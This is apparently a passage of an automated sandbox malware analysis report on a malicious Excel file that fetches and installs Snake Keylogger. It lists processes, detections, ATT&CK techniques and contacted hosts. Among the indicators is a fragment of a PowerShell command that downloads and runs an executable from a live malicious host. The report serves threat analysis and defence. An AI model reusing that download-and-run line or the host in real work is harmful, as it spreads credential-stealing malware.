              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\svcost.exe "C:\Users\user\AppData\Roaming\svcost.exe" Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp7752.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeQueries volume information: C:\Users\user\AppData\Roaming\svcost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Snake Keylogger
              Source: Yara matchFile source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTR
              Source: Yara matchFile source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Snake Keylogger
              Source: Yara matchFile source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information331
              Scripting              		Valid Accounts13
              Exploitation for Client Execution              		331
              Scripting              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		OS Credential Dumping2
              File and Directory Discovery              		Remote Services11
              Archive Collected Data              		2
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		11
              Process Injection              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory13
              System Information Discovery              		Remote Desktop ProtocolData from Removable Media11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		3
              Obfuscated Files or Information              		Security Account Manager21
              Security Software Discovery              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell              		2
              Registry Run Keys / Startup Folder              		2
              Registry Run Keys / Startup Folder              		1
              Install Root Certificate              		NTDS1
              Process Discovery              		Distributed Component Object ModelInput Capture13
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing              		LSA Secrets31
              Virtualization/Sandbox Evasion              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading              		DCSync1
              Remote System Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Modify Registry              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
              Virtualization/Sandbox Evasion              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
              Process Injection              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1562381 Sample: 7qsPAygCOx.xlsx Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 34 Found malware configuration 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 Antivirus detection for URL or domain 2->38 40 15 other signatures 2->40 7 EXCEL.EXE 30 14 2->7         started        11 wscript.exe 1 2->11         started        process3 file4 28 C:\Users\user\Desktop\~$7qsPAygCOx.xlsx, data 7->28 dropped 50 Suspicious powershell command line found 7->50 13 powershell.exe 12 7 7->13         started        52 Windows Scripting host queries suspicious COM object (likely to drop second stage) 11->52 18 svcost.exe 2 11->18         started        signatures5 process6 dnsIp7 32 cia.tf 104.21.1.182, 443, 49163 CLOUDFLARENETUS United States 13->32 30 C:\Users\user\AppData\Local\...\tmp7752.exe, PE32 13->30 dropped 54 Installs new ROOT certificates 13->54 56 Powershell drops PE file 13->56 20 tmp7752.exe 4 13->20         started        58 Antivirus detection for dropped file 18->58 60 Machine Learning detection for dropped file 18->60 file8 signatures9 process10 file11 24 C:\Users\user\AppData\Roaming\svcost.exe, PE32 20->24 dropped 26 C:\Users\user\AppData\Roaming\...\svcost.vbs, ASCII 20->26 dropped 42 Multi AV Scanner detection for dropped file 20->42 44 Machine Learning detection for dropped file 20->44 46 Drops VBS files to the startup folder 20->46 48 2 other signatures 20->48 signatures12

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              7qsPAygCOx.xlsx47%ReversingLabsWin32.Trojan.Generic
              7qsPAygCOx.xlsx100%AviraVBA/Dldr.Agent.MR
              7qsPAygCOx.xlsx100%AviraHEUR/Macro.Downloader.ARIM.Gen
              7qsPAygCOx.xlsx100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\svcost.exe100%AviraHEUR/AGEN.1310409
              C:\Users\user\AppData\Roaming\svcost.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\tmp7752.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\tmp7752.exe68%ReversingLabsByteCode-MSIL.Trojan.RedLineStealer

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://cia.tf0%Avira URL Cloudsafe
              https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exed0%Avira URL Cloudsafe
              https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;z0%Avira URL Cloudsafe
              https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;0%Avira URL Cloudsafe
              https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe100%Avira URL Cloudmalware
              http://cia.tf0%Avira URL Cloudsafe
              https://cia.tf/2ed7362e959d42385d4e6d231a6840ddB.0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cia.tf
              		104.21.1.182
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exetrue
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.423968038.00000000123F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.00000000025CB000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exedpowershell.exe, 00000002.00000002.415334171.00000000002CE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://stackoverflow.com/q/14436606/23354svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://github.com/mgravell/protobuf-netJtmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://crl.entrust.net/server1.crl0powershell.exe, 00000002.00000002.425832716.000000001C1CD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://ocsp.entrust.net03powershell.exe, 00000002.00000002.425832716.000000001C1CD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://ocsps.ssl.com0?powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                            		high
                            https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;zpowershell.exe, 00000002.00000002.415334171.00000000002CE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 00000002.00000002.415420212.00000000025CB000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                                		high
                                https://contoso.com/Iconpowershell.exe, 00000002.00000002.415420212.00000000025CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/mgravell/protobuf-nettmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://cia.tfpowershell.exe, 00000002.00000002.415420212.0000000003F5F000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Qpowershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                                      		high
                                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://ocsps.ssl.com0powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                                          		high
                                          https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;powershell.exe, 00000002.00000002.425256294.000000001AB15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415390039.0000000001BE6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425588760.000000001AF66000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415315754.0000000000204000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425832716.000000001C227000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                                              		high
                                              http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                                                		high
                                                https://cia.tf/2ed7362e959d42385d4e6d231a6840ddB.vbaProject.binfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://go.microspowershell.exe, 00000002.00000002.415420212.00000000037E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                                                    		high
                                                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://crls.ssl.com/ssl.com-rsa-RootCA.crl0powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                                                        		high
                                                        https://github.com/mgravell/protobuf-netitmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                                                            		high
                                                            http://cia.tfpowershell.exe, 00000002.00000002.415420212.0000000003F77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://stackoverflow.com/q/11564914/23354;tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://stackoverflow.com/q/2152978/23354tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://checkip.dyndns.org/qtmp7752.exe, 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://contoso.com/powershell.exe, 00000002.00000002.415420212.00000000025CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.423968038.00000000123F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.00000000025CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.ssl.com/repository0powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                                                                        		high
                                                                        http://ocsps.ssl.com0_powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                                                                          		high
                                                                          http://ocsp.entrust.net0Dpowershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425256294.000000001AB43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.415420212.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.489076925.0000000002882000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.000000000266B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drfalse
                                                                                		high
                                                                                https://secure.comodo.com/CPS0powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425256294.000000001AB43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://crl.entrust.net/2048ca.crl0powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425256294.000000001AB43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://reallyfreegeoip.org/xml/tmp7752.exe, 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      104.21.1.182
                                                                                      		cia.tfUnited States
                                                                                      		13335CLOUDFLARENETUSfalse

                                                                                      General Information

                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1562381
                                                                                      Start date and time:2024-11-25 15:05:58 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 8m 14s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                      Number of analysed new started processes analysed:12
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:7qsPAygCOx.xlsx
                                                                                      renamed because original name is a hash value
                                                                                      Original Sample Name:b416b3cd07533aa1e3f322bbf904be65df03dcf08507ef9a683271a3c4848025.xlsx
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.expl.evad.winXLSX@8/14@1/1
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 66.7%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 94%
                                                                                      • Number of executed functions: 520
                                                                                      • Number of non-executed functions: 30
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .xlsx
                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                      • Attach to Office via COM
                                                                                      • Scroll down
                                                                                      • Close Viewer

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 104.208.16.93
                                                                                      • Excluded domains from analysis (whitelisted): onedsblobprdcus07.centralus.cloudapp.azure.com, watson.microsoft.com, legacywatson.trafficmanager.net
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 3532 because it is empty
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: 7qsPAygCOx.xlsx

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      06:07:32AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs
                                                                                      09:07:09API Interceptor25x Sleep call for process: powershell.exe modified
                                                                                      09:07:18API Interceptor184x Sleep call for process: tmp7752.exe modified
                                                                                      09:07:40API Interceptor20x Sleep call for process: wscript.exe modified
                                                                                      09:07:43API Interceptor97x Sleep call for process: svcost.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      104.21.1.182LAQfpnQvPQ.exeGet hashmaliciousSnake KeyloggerBrowse

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        cia.tfLAQfpnQvPQ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.1.182
                                                                                        DGTCkacbSz.xlsxGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 172.67.129.178
                                                                                        idk_1.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 172.67.129.178
                                                                                        FreeCs2Skins.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 172.67.129.178
                                                                                        Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                        • 172.67.129.178

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUSjbuESggTv0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 172.67.177.134
                                                                                        tJzfnaqOxj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 172.67.177.134
                                                                                        file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                        • 104.26.1.231
                                                                                        LAQfpnQvPQ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 172.67.177.134
                                                                                        DGTCkacbSz.xlsxGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 172.67.129.178
                                                                                        idk_1.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 172.67.129.178
                                                                                        FreeCs2Skins.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 172.67.129.178
                                                                                        Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                        • 104.26.13.205
                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                        • 172.64.41.3
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.155.47

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        05af1f5ca1b87cc9cc9b25185115607dDGTCkacbSz.xlsxGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.1.182
                                                                                        OC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                        • 104.21.1.182
                                                                                        Shipping Document.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.21.1.182
                                                                                        Dl2EmyL53n.docGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.1.182
                                                                                        solicitud de cotizaci#U00f3n..09.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.1.182
                                                                                        kXPgmYpAPg.docGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.1.182
                                                                                        pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                        • 104.21.1.182
                                                                                        PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                                                        • 104.21.1.182
                                                                                        Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                        • 104.21.1.182
                                                                                        Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.21.1.182

                                                                                        Dropped Files

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        C:\Users\user\AppData\Local\Temp\tmp7752.exeDGTCkacbSz.xlsxGet hashmaliciousSnake KeyloggerBrowse

                                                                                          Created / dropped Files

